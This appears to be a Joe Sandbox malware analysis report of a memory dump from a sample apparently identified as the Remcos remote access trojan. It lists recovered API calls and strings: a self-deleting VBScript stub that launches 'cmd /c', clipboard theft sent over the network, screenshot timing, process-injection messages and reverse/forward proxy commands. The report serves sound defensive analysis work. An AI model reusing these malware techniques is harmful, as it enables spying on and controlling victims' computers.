                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                          • API String ID: 1913171305-2411266221
                                                                                          • Opcode ID: aa01c724678a77a7f266d250699ed78b0e530eeae90dcf4a694e4abb02ef66b9
                                                                                          • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                                                          • Opcode Fuzzy Hash: aa01c724678a77a7f266d250699ed78b0e530eeae90dcf4a694e4abb02ef66b9
                                                                                          • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                          • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                          • __dosmaperr.LIBCMT ref: 0043A926
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                          • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                          • __dosmaperr.LIBCMT ref: 0043A963
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                          • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                          • _free.LIBCMT ref: 0043A9C3
                                                                                          • _free.LIBCMT ref: 0043A9CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                          • String ID:
                                                                                          • API String ID: 2441525078-0
                                                                                          • Opcode ID: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                                          • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                          • Opcode Fuzzy Hash: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                                          • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                          APIs
                                                                                          • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                                          • TranslateMessage.USER32(?), ref: 0040557E
                                                                                          • DispatchMessageA.USER32(?), ref: 00405589
                                                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                          • API String ID: 2956720200-749203953
                                                                                          • Opcode ID: 1bd109076387e121da66e8bdd14051b4dbf222a8e6c68161d63d47e83e4b79c6
                                                                                          • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                                          • Opcode Fuzzy Hash: 1bd109076387e121da66e8bdd14051b4dbf222a8e6c68161d63d47e83e4b79c6
                                                                                          • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                                          APIs
                                                                                          • OpenClipboard.USER32 ref: 0041697C
                                                                                          • EmptyClipboard.USER32 ref: 0041698A
                                                                                          • CloseClipboard.USER32 ref: 00416990
                                                                                          • OpenClipboard.USER32 ref: 00416997
                                                                                          • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                          • CloseClipboard.USER32 ref: 004169BF
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                          • String ID: !D@
                                                                                          • API String ID: 2172192267-604454484
                                                                                          • Opcode ID: d45687c870201b0dabbd41d7f1757c88dbe4de035b9da3459f2691080a45fbe1
                                                                                          • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                                          • Opcode Fuzzy Hash: d45687c870201b0dabbd41d7f1757c88dbe4de035b9da3459f2691080a45fbe1
                                                                                          • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                          • String ID:
                                                                                          • API String ID: 221034970-0
                                                                                          • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                          • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                          • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                          • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 004481B5
                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                          • _free.LIBCMT ref: 004481C1
                                                                                          • _free.LIBCMT ref: 004481CC
                                                                                          • _free.LIBCMT ref: 004481D7
                                                                                          • _free.LIBCMT ref: 004481E2
                                                                                          • _free.LIBCMT ref: 004481ED
                                                                                          • _free.LIBCMT ref: 004481F8
                                                                                          • _free.LIBCMT ref: 00448203
                                                                                          • _free.LIBCMT ref: 0044820E
                                                                                          • _free.LIBCMT ref: 0044821C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                          • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                          • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                          • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                          • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                          • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                          • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                          • API String ID: 489098229-3790400642
                                                                                          • Opcode ID: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                                                          • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                                          • Opcode Fuzzy Hash: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                                                          • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                                          APIs
                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DecodePointer
                                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                          • API String ID: 3527080286-3064271455
                                                                                          • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                          • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                                          • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                          • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                                          APIs
                                                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                          • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                          • API String ID: 1462127192-2001430897
                                                                                          • Opcode ID: 7ee4514eed1a1dddd906965fce02a2aa16fc20dadb78bf3722bf63102eb4391d
                                                                                          • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                                          • Opcode Fuzzy Hash: 7ee4514eed1a1dddd906965fce02a2aa16fc20dadb78bf3722bf63102eb4391d
                                                                                          • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe), ref: 004074D9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentProcess
                                                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                          • API String ID: 2050909247-4242073005
                                                                                          • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                          • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                                          • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                          • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                          • int.LIBCPMT ref: 00410EBC
                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                          • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                          • String ID: ,kG$0kG
                                                                                          • API String ID: 3815856325-2015055088
                                                                                          • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                          • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                                          • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                          • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                            • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                            • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                            • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                          • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                          • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                          • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                          • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                          • String ID: Remcos
                                                                                          • API String ID: 1970332568-165870891
                                                                                          • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                          • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                                          • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                          • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                          • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                          • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                          • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(?,?), ref: 00453EAF
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453F32
                                                                                          • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453FC5
                                                                                          • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453FDC
                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00454058
                                                                                          • __freea.LIBCMT ref: 00454083
                                                                                          • __freea.LIBCMT ref: 0045408F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                          • String ID:
                                                                                          • API String ID: 201697637-0
                                                                                          • Opcode ID: 1c79323f55dedcab474402cd530056180fcf6acbc2628831f9fcb1c62bebc053
                                                                                          • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                          • Opcode Fuzzy Hash: 1c79323f55dedcab474402cd530056180fcf6acbc2628831f9fcb1c62bebc053
                                                                                          • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                          APIs
                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                          • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                          • _free.LIBCMT ref: 00445515
                                                                                          • _free.LIBCMT ref: 0044552E
                                                                                          • _free.LIBCMT ref: 00445560
                                                                                          • _free.LIBCMT ref: 00445569
                                                                                          • _free.LIBCMT ref: 00445575
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                                                          • String ID: C
                                                                                          • API String ID: 1679612858-1037565863
                                                                                          • Opcode ID: dc70f5935c4cadc04478971efa28b20dbce750eb1dc69c9fe13c760ed60cdc29
                                                                                          • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                          • Opcode Fuzzy Hash: dc70f5935c4cadc04478971efa28b20dbce750eb1dc69c9fe13c760ed60cdc29
                                                                                          • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: tcp$udp
                                                                                          • API String ID: 0-3725065008
                                                                                          • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                          • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                          • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                          • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Eventinet_ntoa
                                                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                          • API String ID: 3578746661-168337528
                                                                                          • Opcode ID: c7f8161b1059d753f30ac63477e8785a79ccdfa97665b3063efb0bf321f4031e
                                                                                          • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                                          • Opcode Fuzzy Hash: c7f8161b1059d753f30ac63477e8785a79ccdfa97665b3063efb0bf321f4031e
                                                                                          • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                                          APIs
                                                                                            • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                          • String ID: <$@$Temp
                                                                                          • API String ID: 1704390241-1032778388
                                                                                          • Opcode ID: fdfef061a0c845b66634ed9213ec91d51d63ab98c4c1b6a43026fae5df42adc0
                                                                                          • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                                          • Opcode Fuzzy Hash: fdfef061a0c845b66634ed9213ec91d51d63ab98c4c1b6a43026fae5df42adc0
